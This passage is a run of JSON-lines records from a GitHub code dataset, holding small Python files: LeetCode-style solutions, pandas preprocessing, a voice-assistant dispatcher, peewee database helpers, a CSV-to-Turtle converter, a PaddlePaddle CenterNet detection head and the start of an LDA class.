dotFile\n","repo_name":"justjulian/math-genealogy-db","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4740695423","text":"\"\"\"\nAn image is represented by a 2-D array of integers,\neach integer representing the pixel value of the image (from 0 to 65535).\n\nGiven a coordinate (sr, sc) representing the starting pixel\n(row and column) of the flood fill, and a pixel value newColor,\n\"flood fill\" the image.\n\nTo perform a \"flood fill\", consider the starting pixel, plus any\npixels connected 4-directionally to the starting pixel of the same color\nas the starting pixel, plus any pixels connected 4-directionally to those\npixels (also with the same color as the starting pixel), and so on. Replace\nthe color of all of the aforementioned pixels with the newColor.\n\nAt the end, return the modified image.\n\"\"\"\nfrom typing import List\n\ndef fill(image, row, col, new_color, old_color):\n    if row < 0 or col < 0 or row >= len(image) or col >= len(image[0]):\n        return\n    if image[row][col] != old_color:\n        return\n    image[row][col] = new_color\n    fill(image, row + 1, col, new_color, old_color)\n    fill(image, row - 1, col, new_color, old_color)\n    fill(image, row , col + 1, new_color, old_color)\n    fill(image, row , col - 1, new_color, old_color)\n\ndef floodFill(image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:\n    if image[sr][sc]==newColor:\n        return image\n    fill(image, sr, sc, newColor, image[sr][sc])\n    return image\n\nprint(floodFill([[0,0,0],[0,1,0]],1,1,1))\n","repo_name":"vyshuks/may-leetcoding-challenge","sub_path":"flood_fill.py","file_name":"flood_fill.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27780074827","text":"#Given the head of a singly linked list, reverse the list, and return the reversed list.\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, val=0, next=None):\n#         self.val = val\n#         self.next = next\n\nclass Solution(object):\n    def reverseList(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        # initializing the two pointers curr and prev\n        curr = head\n        prev = None\n        while curr: # looping until curr becomes None\n            temp = curr.next # temporarily storing the link to the next node before breaking it\n            curr.next = prev # reversing the direction\n            # updating pointers for the next iteration\n            prev = curr \n            curr = temp\n        return prev \n# returning prev since it'll be the last node of the linked list, which becomes the first node of the reversed linked list\n","repo_name":"ronnitburman/Leet_Code_Problems","sub_path":"LeetCode_206_Reverse_Linked_List.py","file_name":"LeetCode_206_Reverse_Linked_List.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21131519153","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. 
pd.read_csv)\nimport time\n\ndf_train = pd.read_csv('train_2017-06-15_to_2017-08-15.csv')\n#df_test = pd.read_csv('../data/test.csv')\n#df_sample = pd.read_csv('../data/sample_submission.csv')\ndf_stores = pd.read_csv('../data/stores.csv')\ndf_items = pd.read_csv('../data/items.csv')\ndf_transactions = pd.read_csv('../data/transactions.csv')\ndf_oil = pd.read_csv('../data/oil.csv')\ndf_holidays_events = pd.read_csv('../data/holidays_events.csv')\n\ndf_stores['stype'] = df_stores['type']\ndf_stores = df_stores.drop(['type'],axis=1)\n\ndict_family = {k: v for v,k in enumerate(df_items.family.unique()) }\ndict_city = {k: v for v,k in enumerate(df_stores.city.unique()) }\ndict_state = {k: v for v,k in enumerate(df_stores.state.unique()) }\ndict_stype = {k: v for v,k in enumerate(np.sort(df_stores.stype.unique())) }\ndict_type = {k: v for v,k in enumerate(df_holidays_events.type.unique()) }\ndict_holidays = {k: v for v,k in enumerate(df_holidays_events.description.unique()) }\ndict_locale = {k: v for v,k in enumerate(df_holidays_events.locale.unique()) }\ndict_locale_name = {k: v for v,k in enumerate(df_holidays_events.locale_name.unique()) }\n\nprint('-------- train --------')\nprint(df_train.head(5))\n\n\nprint('-------- stores --------')\nprint(df_stores.head(5))\n\nprint('-------- items --------')\nprint(df_items.head(5))\n\nprint('-------- transactions --------')\nprint(df_transactions.head(5))\n\nprint('-------- oil --------')\nprint(df_oil.head(5))\n\nprint('-------- holidays and events --------')\nprint(df_holidays_events.head(5))\n\n# map names to numbers by dictionaries\ndf_items = df_items.replace({'family':dict_family})\ndf_stores = df_stores.replace({'city':dict_city, 'state':dict_state, 'stype':dict_stype})\ndf_holidays_events = df_holidays_events.replace({'type':dict_type,'locale':dict_locale,'locale_name':dict_locale_name,'description':dict_holidays})\n\nstart_time = time.time()\n\ngrouped = df_train.groupby('date')\ndf_combine_list = []\nfor date, group in grouped:\n    #print('merging date ',date)\n    group = pd.merge(group, df_transactions, on=['date','store_nbr'], how='left')\n    group = pd.merge(group, df_oil, on='date', how='left')\n    group = pd.merge(group, df_holidays_events, on='date', how='left')\n    group = pd.merge(group, df_items, on='item_nbr', how='left')\n    group = pd.merge(group, df_stores, on='store_nbr', how='left')\n    df_combine_list.append(group)\n\ndf_combine = pd.concat(df_combine_list, axis=0)\nelapsed_time = time.time() - start_time\nprint('Used time on merging: ', elapsed_time)\n\nprint('-------- combined data --------')\nprint(df_combine.head(10))\n\noutname='combine_data_2017-06-15_to_2017-08-15.csv'\ndf_combine.to_csv(outname,header=True,index=False,mode='w')\n","repo_name":"bingchuhuang/kaggle-CorpFavorita","sub_path":"data_preprocess/show_feature.py","file_name":"show_feature.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40951735056","text":"# This is the main file; every other module is controlled from here\nimport speech\nimport sites\nimport newsreader\nimport audio\nimport wikidata\nimport sendmail\nimport osmodule\naudio.speak(\"Hello! Welcome to the world of AI. I am Professor. How may I help you?\") # calling the audio module\n#audio.speak(\"હેલો હું ચુ પ્રોફેસર મની હેઇસ્ટ થી વાત કરું છું\")\naudio.speak(\"kem chho! Artificial intelligence nee duniyaa ma tamaro swagat che! 
hu chhu professor\")\n\nwhile True: # the professor keeps listening until \"stop\" is said.\n    results=speech.take() # the speech module's take() converts audio to text\n    if(\"wikipedia\") in results: \n        wikidata.wikiInfo(results) # calls wikiInfo() from the wikidata module\n    elif(\"news\") in results:\n        newsreader.readnews() # calls readnews() from the newsreader module\n    elif \"youtube\" in results: # opens YouTube if the word youtube appears in the user's statement\n        sites.website(results)\n    elif \"google\" in results:\n        sites.website(results)\n    elif \"instagram\" in results:\n        sites.website(results)\n    elif \"netflix\" in results:\n        sites.website(results)\n    elif \"amazon\" in results:\n        sites.website(results)\n    elif \"gmail\" in results:\n        sites.website(results) \n    elif \"mail\" in results:\n        sendmail.emailfun() # if the user wants to send a mail, emailfun() from sendmail.py is called \n    elif \"pc\" in results: # if the user wants to open any file, program, application or movie \n        osmodule.command() # calls command() from the osmodule module\n    elif(\"stop\") in results: # if the user says stop we exit the loop and the program ends\n        break\naudio.speak(\"I am tired now! Bye bye!\")","repo_name":"Aayush1406/Desktop-Virtual-Assisstant","sub_path":"final.py","file_name":"final.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29959039295","text":"import os\nfrom typing import NamedTuple\nfrom datetime import datetime\nfrom peewee import SqliteDatabase\n\nfrom models.race_model import Driver, Company, Race, database_proxy\nfrom database import PATH_TO_DATABASE\nfrom database.exceptions.create import DatabaseAlreadyExist, DatabaseTableAlreadyExist\n\n\nclass RaceReport(NamedTuple):\n    place: int\n    driver: str\n    company: str\n    race_time: datetime\n\n\ndef create_db(db_name: str) -> bool:\n    if os.path.isfile(os.path.join(PATH_TO_DATABASE, db_name)):\n        raise DatabaseAlreadyExist(f'Database {db_name} already exists')\n\n    db = SqliteDatabase(os.path.join(PATH_TO_DATABASE, db_name))\n    database_proxy.initialize(db)\n    db.create_tables([Driver, Company, Race])\n    return True\n\n\ndef write_drivers(drivers: list[dict[str, str]]) -> bool:\n    if not Driver.select().count():\n        for driver in drivers:\n            driver = Driver(abbr=driver['abbr'], name=driver['name'])\n            driver.save()\n        return True\n    raise DatabaseTableAlreadyExist('Table \"Driver\" is not empty; doing nothing')\n\n\ndef write_companies(companies: list[dict[str, str]]) -> bool:\n    if not Company.select().count():\n        for company in companies:\n            company = Company(name=company['name'])\n            company.save()\n        return True\n    raise DatabaseTableAlreadyExist('Table \"Company\" is not empty; doing nothing')\n\n\ndef write_race_table(race_table: list[RaceReport]) -> bool:\n    if not Race.select().count():\n        for race in race_table:\n            driver_rows = Driver.select().where(Driver.name == race.driver)\n            company_rows = Company.select().where(Company.name == race.company)\n            if driver_rows and company_rows:\n                place = race.place\n                driver = list(driver_rows).pop()\n                company = list(company_rows).pop()\n                race_time = race.race_time\n                race_complete = Race(\n                    place=place,\n                    driver=driver,\n                    company=company,\n                    time=race_time\n                )\n                race_complete.save()\n        return True\n    raise DatabaseTableAlreadyExist('Table \"Race\" is not empty; 
doing nothing')\n","repo_name":"wspr/herries-press","sub_path":"convert_log_files_into_db/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"37"} +{"seq_id":"8038202489","text":"import configparser\nimport csv\nimport pydash\nimport re\n\nclass Triplificator:\n\n    def __init__(self, csvPath, rowNumTitle, rowNumFirst, rowNumLast, separator, dataPrefixIRI, predicatPrefixIRI, isTitle):\n\n        # Initialisation of the config file reading\n        config = configparser.ConfigParser()\n        config.read(\"utils/config.ini\") # the configParser strips the spaces before and after the value\n\n        # Setting up the object variables from the config file or the user input\n\n        # CSV\n        self.csvPath = csvPath\n\n        # isTitle boolean\n        self.isTitle = isTitle\n        \n        # Set up the object variables, but neither their coherence (e.g. title not on the first non-empty row) nor the indexes\n        if (rowNumTitle is None):\n            self.rowNumTitle = config[\"CSV\"][\"titleRow\"]\n        else:\n            self.rowNumTitle = int(rowNumTitle)\n\n        if (rowNumFirst is None):\n            self.rowNumFirst = config[\"CSV\"][\"firstDataRow\"]\n        else:\n            self.rowNumFirst = int(rowNumFirst)\n\n        if (rowNumLast is None):\n            self.rowNumLast = config[\"CSV\"][\"lastDataRow\"]\n        else:\n            self.rowNumLast = int(rowNumLast)\n\n        if (separator is None):\n            print(\"SEPARATOR NONE\")\n            self.separator = config[\"CSV\"][\"separator\"]\n        else:\n            self.separator = separator\n\n        # TURTLE\n        if (dataPrefixIRI is None):\n            self.dataPrefixIRI = config[\"TURTLE\"][\"dataPrefixIRI\"]\n        else:\n            self.dataPrefixIRI = dataPrefixIRI\n\n        self.dataPrefix = re.findall(r'^[a-zA-Z]*:', self.dataPrefixIRI)[0]\n\n        if (predicatPrefixIRI is None):\n            self.predicatPrefixIRI = config[\"TURTLE\"][\"predicatPrefixIRI\"]\n        else:\n            self.predicatPrefixIRI = predicatPrefixIRI\n\n        self.predicatPrefix = re.findall(r'^[a-zA-Z]*:', self.predicatPrefixIRI)[0]\n\n        print(self.csvPath)\n        print(self.rowNumTitle)\n        print(self.rowNumFirst)\n        print(self.rowNumLast)\n        print(\"SEPARATOR\")\n        print(self.separator)\n        print(self.dataPrefixIRI)\n        print(self.predicatPrefixIRI)\n        print(self.dataPrefix)\n        print(self.predicatPrefix)\n\n        self.checkValues() # = Triplificator.checkValues(self)\n\n\n\n    def checkValues(self): # check that the user-entered values are consistent (e.g. the title row is said to be row 12 but is not actually the first row)\n        # and rewrite them from the CSV when needed (e.g. the title defaults to row 0 but may actually be on row 4)\n        with open(self.csvPath, 'r', encoding=\"utf-8\") as csvFile:\n\n            # set up of the title row number\n            csvReader = csv.reader(csvFile, delimiter=self.separator) # object: csv.Reader -> not subscriptable\n            csvReader = list(csvReader) # object: list -> subscriptable\n\n\n            if (self.rowNumTitle == \"FirstRow\"):\n                # check for the first non-empty list\n                self.rowNumTitle = next(idx for idx, row in enumerate(csvReader) if row)\n            else:\n                # if row 1 contains titles -> index 0 contains titles (we want the index)\n                self.rowNumTitle = self.rowNumTitle - 1\n            \n            if (self.rowNumFirst == \"AfterTitle\"):\n                if (not(self.isTitle)):\n                    self.rowNumFirst = self.rowNumTitle\n                else:\n                    # check for the first non-empty list after the title\n                    self.rowNumFirst = next(idx for idx, row in enumerate(csvReader) if row and idx > self.rowNumTitle)\n            else:\n                self.rowNumFirst = self.rowNumFirst - 1\n\n            if (self.rowNumLast == \"EndFile\"):\n                # check for the last non-empty list after the title\n                self.rowNumLast = [idx for idx, row in enumerate(csvReader) if row][-1]\n            else:\n                
self.rowNumLast = self.rowNumLast - 1\n\n\n        print(\"Row num title after coherence treatment \"+str(self.rowNumTitle))\n        print(\"Row first data after coherence treatment \"+str(self.rowNumFirst))\n        print(\"Row last data after coherence treatment \"+str(self.rowNumLast))\n\n\n\n\n\n    def writeFile(self, path):\n        #here we assume that we have all the good configuration variables in our object, and rows numbers as indexes\n\n        #write in output.ttl file\n        with open(path, \"w\", encoding=\"utf-8\") as turtleFile:\n            #first two rows are prefixes and the corresponding IRIs\n            turtleFile.write(\"@prefix \"+self.dataPrefixIRI+\" .\\n\")\n            turtleFile.write(\"@prefix \"+self.predicatPrefixIRI+\" .\\n\\n\")\n\n            #open the csv to write info in ttl\n            lineIndex = self.rowNumFirst\n            with open(self.csvPath, 'r', encoding=\"utf-8\") as csvFile:\n                csvReader = csv.reader(csvFile, delimiter=self.separator) #object: csv.Reader -> not subscriptable\n                csvReader = list(csvReader) #object: list -> subscriptable\n                print(csvReader)\n                print(\"IS THERE A TITLE\", self.isTitle)\n                print(\"IS THERE A TITLE\", type(self.isTitle))\n                #select the list of titles (titles = potential csv column names)\n                if (self.isTitle):\n                    print(\"YES TITLE\")\n                    self.listTitles = [row for idx, row in enumerate(csvReader) if idx == self.rowNumTitle][0]\n                    self.listTitles = list(map(pydash.camel_case, self.listTitles))\n\n                    self.listData = [row for idx, row in enumerate(csvReader) if idx in range(self.rowNumFirst, self.rowNumLast+1)]\n                    for row in self.listData:\n                        turtleFile.write(self.dataPrefix + str(lineIndex+1) + \"\\t\\t\")\n                        dictRow = dict(zip(self.listTitles, row))\n                        for key, value in dictRow.items():\n                            turtleFile.write(self.predicatPrefix+str(key) + \"\\t\\t\" + \"\\\"\"+value+\"\\\"\" + \" ;\\n\\t\\t\")\n                        turtleFile.write(\".\\n\")\n                        lineIndex += 1\n\n                else: #if no titles\n                    print(\"NO TITLE\")\n                    self.nbCol = len(csvReader[self.rowNumTitle])\n                    self.listTitles = [\"attribute\"+str(i+1) for i in range(self.nbCol)]\n                    print(self.rowNumTitle)\n                    print(self.rowNumFirst)\n\n                    self.listData = [row for idx, row in enumerate(csvReader) if idx in range(self.rowNumFirst, self.rowNumLast+1)]\n                    for row in self.listData:\n                        turtleFile.write(self.dataPrefix + str(lineIndex+1) + \"\\t\\t\")\n                        dictRow = dict(zip(self.listTitles, row))\n                        for key, value in dictRow.items():\n                            turtleFile.write(self.predicatPrefix+str(key) + \"\\t\\t\" + \"\\\"\"+value+\"\\\"\" + \" ;\\n\\t\\t\")\n                        turtleFile.write(\".\\n\")\n                        lineIndex += 1\n\n        \n        \n\n\n\nif __name__ == \"__main__\": \n    chemin = \"data/test3.csv\"\n    #None if the user does not enter anything for the below variables\n    #If user enters all rows are str\n    ligneTitre = None\n    lignePremier = 4\n    ligneDernier = 18\n    sep = \"|\"\n    dataPrefIRI = None\n    predicatPrefIRI = \"pp: \"\n    #We assume that we have logical variables here, like rowNumTitle < rowFirstData < rowLastData etc.\n    #globally things that can be handled using a web script such as JS, Django does that also\n    a = Triplificator(chemin, ligneTitre, lignePremier, ligneDernier, sep, dataPrefIRI, predicatPrefIRI, True)\n    a.writeFile(\"output.ttl\")  #writeFile() requires an output path; \"output.ttl\" matches the comment in writeFile\n    ","repo_name":"Lxkx/triplifier","sub_path":"triplifier/utils/triplificator.py","file_name":"triplificator.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8284781243","text":"# https://leetcode.com/problems/container-with-most-water/submissions/\n\n\ndef maxArea(height):\n    \n    maxarea = float(\"-inf\")\n    start = 0\n    end = len(height)-1\n    
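# Editor's note on the two-pointer scan below (comment only, not in the
# original file): the area is capped by the shorter line, so once a pointer
# holds the shorter side no other partner can improve that side's best area;
# advancing the shorter pointer is therefore safe, giving an O(n) scan
# instead of the O(n^2) brute force kept commented out at the bottom.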
\n while start <= end:\n left = height[start]\n right = height[end]\n maxarea = max(maxarea, (end-start)*(min(left, right )))\n \n if left < right:\n start +=1\n else:\n end -=1\n \n return maxarea\n \n \n \n \n # bruteforce\n \n# maxarea = float(\"-inf\")\n \n# for i in range(len(height)):\n# for j in range(i+1, len(height)):\n# left = height[i]\n# right = height[j]\n \n# maxarea = max(maxarea, min(left,right) * (j-i))\n \n# return maxarea","repo_name":"bolu-tife/Data-Structures-and-Algorithms","sub_path":"Leetcode Questions/container_with_most_water.py","file_name":"container_with_most_water.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7013148243","text":"import math\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nfrom paddle.nn.initializer import KaimingUniform\nfrom paddle.nn.initializer import Constant, Normal\nfrom ppdet.core.workspace import register\nfrom ppdet.modeling.losses import CTFocalLoss\nfrom paddle.vision.ops import DeformConv2D\nfrom paddle.regularizer import L2Decay\nfrom paddle import ParamAttr\n\nclass DeformableConvV2(nn.Layer):\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n weight_attr=None,\n bias_attr=None,\n lr_scale=1,\n regularizer=None,\n skip_quant=False,\n dcn_bias_regularizer=L2Decay(0.),\n dcn_bias_lr_scale=2.):\n super(DeformableConvV2, self).__init__()\n self.offset_channel = 2 * kernel_size**2\n self.mask_channel = kernel_size**2\n\n if lr_scale == 1 and regularizer is None:\n offset_bias_attr = ParamAttr(initializer=Constant(0.))\n else:\n offset_bias_attr = ParamAttr(\n initializer=Constant(0.),\n learning_rate=lr_scale,\n regularizer=regularizer)\n self.conv_offset = nn.Conv2D(\n in_channels,\n 3 * kernel_size**2,\n kernel_size,\n stride=stride,\n padding=(kernel_size - 1) // 2,\n weight_attr=ParamAttr(initializer=Constant(0.0)),\n bias_attr=offset_bias_attr)\n if skip_quant:\n self.conv_offset.skip_quant = True\n\n if bias_attr:\n # in FCOS-DCN head, specifically need learning_rate and regularizer\n dcn_bias_attr = ParamAttr(\n initializer=Constant(value=0),\n regularizer=dcn_bias_regularizer,\n learning_rate=dcn_bias_lr_scale)\n else:\n # in ResNet backbone, do not need bias\n dcn_bias_attr = False\n self.conv_dcn = DeformConv2D(\n in_channels,\n out_channels,\n kernel_size,\n stride=stride,\n padding=(kernel_size - 1) // 2 * dilation,\n dilation=dilation,\n groups=groups,\n weight_attr=weight_attr,\n bias_attr=dcn_bias_attr)\n\n def forward(self, x):\n offset_mask = self.conv_offset(x)\n offset, mask = paddle.split(\n offset_mask,\n num_or_sections=[self.offset_channel, self.mask_channel],\n axis=1)\n mask = F.sigmoid(mask)\n y = self.conv_dcn(x, offset, mask=mask)\n return y\n\nclass ConvLayer(nn.Layer):\n def __init__(self,\n ch_in,\n ch_out,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups=1,\n bias=False):\n super(ConvLayer, self).__init__()\n bias_attr = False\n fan_in = ch_in * kernel_size**2\n bound = 1 / math.sqrt(fan_in)\n param_attr = paddle.ParamAttr(initializer=KaimingUniform())\n if bias:\n bias_attr = paddle.ParamAttr(\n initializer=nn.initializer.Uniform(-bound, bound))\n self.conv = nn.Conv2D(\n in_channels=ch_in,\n out_channels=ch_out,\n kernel_size=kernel_size,\n stride=stride,\n padding=padding,\n dilation=dilation,\n groups=groups,\n weight_attr=param_attr,\n bias_attr=bias_attr)\n\n def forward(self, 
inputs):\n out = self.conv(inputs)\n\n return out\n\n\n@register\nclass CenterNetHead(nn.Layer):\n \"\"\"\n Args:\n in_channels (int): the channel number of input to CenterNetHead.\n num_classes (int): the number of classes, 80 by default.\n head_planes (int): the channel number in all head, 256 by default.\n heatmap_weight (float): the weight of heatmap loss, 1 by default.\n regress_ltrb (bool): whether to regress left/top/right/bottom or\n width/height for a box, true by default\n size_weight (float): the weight of box size loss, 0.1 by default.\n offset_weight (float): the weight of center offset loss, 1 by default.\n\n \"\"\"\n\n __shared__ = ['num_classes']\n\n def __init__(self,\n in_channels,\n num_classes=80,\n head_planes=256,\n heatmap_weight=1,\n regress_ltrb=True,\n size_weight=0.1,\n offset_weight=1,\n dcn_head=True):\n super(CenterNetHead, self).__init__()\n self.weights = {\n 'heatmap': heatmap_weight,\n 'size': size_weight,\n 'offset': offset_weight\n }\n\n if not dcn_head:\n self.heatmap = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes,\n num_classes,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=True))\n self.heatmap[2].conv.bias[:] = -2.19\n self.size = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes,\n 4 if regress_ltrb else 2,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=True))\n self.offset = nn.Sequential(\n ConvLayer(\n in_channels, head_planes, kernel_size=3, padding=1, bias=True),\n nn.ReLU(),\n ConvLayer(\n head_planes, 2, kernel_size=1, stride=1, padding=0, bias=True))\n else:\n print(\"********** Head use dcn ***************\")\n\n self.heatmap = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes,\n num_classes,\n kernel_size=1,\n stride=1,\n padding=0,\n bias_attr=True))\n self.heatmap[2].conv_dcn.bias[:] = -2.19\n self.size = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes,\n 4 if regress_ltrb else 2,\n kernel_size=1,\n stride=1,\n padding=0,\n bias_attr=True))\n self.offset = nn.Sequential(\n DeformableConvV2(\n in_channels, head_planes, kernel_size=3, padding=1, bias_attr=True),\n nn.ReLU(),\n DeformableConvV2(\n head_planes, 2, kernel_size=1, stride=1, padding=0, bias_attr=True))\n\n self.focal_loss = CTFocalLoss()\n\n @classmethod\n def from_config(cls, cfg, input_shape):\n if isinstance(input_shape, (list, tuple)):\n input_shape = input_shape[0]\n return {'in_channels': input_shape.channels}\n\n def forward(self, feat, inputs):\n heatmap = self.heatmap(feat)\n size = self.size(feat)\n offset = self.offset(feat)\n if self.training:\n loss = self.get_loss(heatmap, size, offset, self.weights, inputs)\n return loss\n else:\n heatmap = F.sigmoid(heatmap)\n return {'heatmap': heatmap, 'size': size, 'offset': offset}\n\n def get_loss(self, heatmap, size, offset, weights, inputs):\n heatmap_target = inputs['heatmap']\n size_target = inputs['size']\n offset_target = inputs['offset']\n index = inputs['index']\n mask = inputs['index_mask']\n heatmap = paddle.clip(F.sigmoid(heatmap), 1e-4, 1 - 1e-4)\n heatmap_loss = self.focal_loss(heatmap, heatmap_target)\n\n size = paddle.transpose(size, perm=[0, 2, 3, 1])\n size_n, size_h, size_w, size_c = size.shape\n size = paddle.reshape(size, 
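# Editor's sketch (NumPy, not Paddle; illustrative shapes only) of the
# flatten-then-gather step performed here: each (N, H, W, C) map becomes
# (N, H*W, C) and one target cell per image is picked out by index.
import numpy as np
feat = np.arange(2 * 6 * 4).reshape(2, 6, 4)   # (N, H*W, C) analogue
idx = np.array([0, 2])                         # one target cell per image
picked = np.stack([feat[i, idx[i]] for i in range(2)])
assert picked.shape == (2, 4)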
shape=[size_n, -1, size_c])\n        index = paddle.unsqueeze(index, 2)\n        batch_inds = list()\n        for i in range(size_n):\n            batch_ind = paddle.full(\n                shape=[1, index.shape[1], 1], fill_value=i, dtype='int64')\n            batch_inds.append(batch_ind)\n        batch_inds = paddle.concat(batch_inds, axis=0)\n        index = paddle.concat(x=[batch_inds, index], axis=2)\n        pos_size = paddle.gather_nd(size, index=index)\n        mask = paddle.unsqueeze(mask, axis=2)\n        size_mask = paddle.expand_as(mask, pos_size)\n        size_mask = paddle.cast(size_mask, dtype=pos_size.dtype)\n        pos_num = size_mask.sum()\n        size_mask.stop_gradient = True\n        size_target.stop_gradient = True\n        size_loss = F.l1_loss(\n            pos_size * size_mask, size_target * size_mask, reduction='sum')\n        size_loss = size_loss / (pos_num + 1e-4)\n\n        offset = paddle.transpose(offset, perm=[0, 2, 3, 1])\n        offset_n, offset_h, offset_w, offset_c = offset.shape\n        offset = paddle.reshape(offset, shape=[offset_n, -1, offset_c])\n        pos_offset = paddle.gather_nd(offset, index=index)\n        offset_mask = paddle.expand_as(mask, pos_offset)\n        offset_mask = paddle.cast(offset_mask, dtype=pos_offset.dtype)\n        pos_num = offset_mask.sum()\n        offset_mask.stop_gradient = True\n        offset_target.stop_gradient = True\n        offset_loss = F.l1_loss(\n            pos_offset * offset_mask,\n            offset_target * offset_mask,\n            reduction='sum')\n        offset_loss = offset_loss / (pos_num + 1e-4)\n\n        det_loss = weights['heatmap'] * heatmap_loss + weights[\n            'size'] * size_loss + weights['offset'] * offset_loss\n\n        return {\n            'det_loss': det_loss,\n            'heatmap_loss': heatmap_loss,\n            'size_loss': size_loss,\n            'offset_loss': offset_loss\n        }\n","repo_name":"PaddlePaddle/awesome-DeepLearning","sub_path":"Paddle_Industry_Practice_Sample_Library/Vehicle_Detection_and_Tracking/code/centernet_head_dcn.py","file_name":"centernet_head_dcn.py","file_ext":"py","file_size_in_byte":10443,"program_lang":"python","lang":"en","doc_type":"code","stars":2544,"dataset":"github-code","pt":"37"} +{"seq_id":"44463589327","text":"# PID for the x direction\nimport numpy as np\np, d = 0.5, 0.5\n\nerrorLR = w // 2 - cx\nposX = p * errorLR + d * (errorLR - perrorLR)\nposX = np.interp(posX, [-w//2, w//2], [20, 160]) # range mapping: maps posX into the [20, 160] range\nperrorLR = errorLR\n\n# object tracking pd control","repo_name":"joohyuk95/python_source_1","sub_path":"openCV/pid_code.py","file_name":"pid_code.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3562731126","text":"def get_first_k(data,length,k,start,end):\n    if start>end:\n        return -1\n    mid_index = (start + end) // 2 # note: start + end here\n    mid_data = data[mid_index]\n    if mid_data == k:\n        if (mid_index>0 and data[mid_index-1]!=k) or mid_index == 0:\n            return mid_index\n        else:\n            end = mid_index - 1\n    elif mid_data < k:\n        start = mid_index + 1\n    else:\n        end = mid_index - 1\n    return get_first_k(data, length, k, start, end)\n\n\ndef get_last_k(data, length, k, start, end):\n    if start > end:\n        return -1\n    mid_index = (start + end) // 2\n    mid_data = data[mid_index]\n    if mid_data == k:\n        if mid_index == length-1 or (mid_index < length-1 and data[mid_index+1]!=k):  # last element, or the next one differs\n            return mid_index\n        else:\n            start = mid_index + 1\n    elif mid_data < k: # k is in the right half\n        start = mid_index + 1\n    else: # k is in the left half\n        end = mid_index - 1\n    return get_last_k(data, length, k, start, end)\n\ndef get_number_of_k(data, length, k):\n    number = 0\n    if data and length>0:\n        first_k = get_first_k(data, length, k, 0, length-1)\n        last_k = get_last_k(data, length, k, 0, length-1)\n        if first_k > -1 and last_k > -1:\n            number = last_k 
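# Editor's cross-check (standard library, not from the original file):
# bisect yields the same first/last indices the recursive searches above
# compute, and hence the same count.
from bisect import bisect_left, bisect_right
data = [1, 2, 3, 3, 3, 4]
first, last = bisect_left(data, 3), bisect_right(data, 3) - 1
assert (first, last, last - first + 1) == (2, 4, 3)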
- first_k +1\n    return number\n\n\n# Non-recursive (iterative) version\ndef get_k_counts(nums, k):\n    first = get_first_k(nums, k)\n    last = get_last_k(nums, k)\n    if first < 0 and last < 0:\n        return 0\n    if first < 0 or last < 0:\n        return 1\n    return last - first + 1\n\n\ndef get_first_k(nums, k):\n    left, right = 0, len(nums) - 1\n    while left <= right:\n        mid = (left + right) // 2\n        if nums[mid] < k:\n            if mid + 1 < len(nums) and nums[mid + 1] == k:\n                return mid + 1\n            left = mid + 1\n        elif nums[mid] == k:\n            if mid - 1 < 0 or (mid - 1 >= 0 and nums[mid - 1] < k):\n                return mid\n            right = mid - 1\n        else:\n            right = mid - 1\n    return -1\n\n\ndef get_last_k(nums, k):\n    left, right = 0, len(nums) - 1\n    while left <= right:\n        mid = (left + right) // 2\n        if nums[mid] < k:\n            left = mid + 1\n        elif nums[mid] == k:\n            if mid + 1 == len(nums) or (mid + 1 < len(nums) and nums[mid + 1] > k):\n                return mid\n            left = mid + 1\n        else:\n            if mid - 1 >= 0 and nums[mid - 1] == k:\n                return mid - 1\n            right = mid - 1\n    return -1\n\n# Simply use list.count() directly\nclass Solution:\n    def GetNumberOfK1(self, data, k):\n        if len(data) == 0:\n            return 0\n        else:\n            return data.count(k)\n","repo_name":"xiaokongkong/some-tricks-about-python","sub_path":"刷题/剑指offer/数组/数字在排序数组中出现的次数.py","file_name":"数字在排序数组中出现的次数.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31685933151","text":"import lda\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom utlis import data\n\n\nclass LDAModel(object):\n    def __init__(self, n_topics=20, n_iter=1000, random_state=None):\n        self.X = None\n        self.word_vector = None\n        self.model = lda.LDA(n_topics=n_topics, 